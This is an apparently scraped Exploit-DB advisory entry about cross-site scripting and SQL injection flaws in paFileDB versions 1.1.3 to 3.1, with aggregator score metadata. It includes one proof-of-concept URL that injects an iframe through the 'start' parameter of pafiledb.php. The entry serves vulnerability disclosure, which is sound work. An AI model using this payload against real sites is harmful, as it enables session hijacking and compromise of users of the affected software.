Lucene search

K
exploitdb[email protected]EDB-ID:25216
HistoryMar 12, 2005 - 12:00 a.m.

PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'category.php?start' Cross-Site Scripting

2005-03-1200:00:00
www.exploit-db.com
16

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/12788/info
   
Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts.
   
Exploitation of these issues may allow for compromise of the software, session hijacking, or attacks against the underlying database. 

http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></iframe>&sortby=date 

AI Score

7.4

Confidence

Low

Related for EDB-ID:25216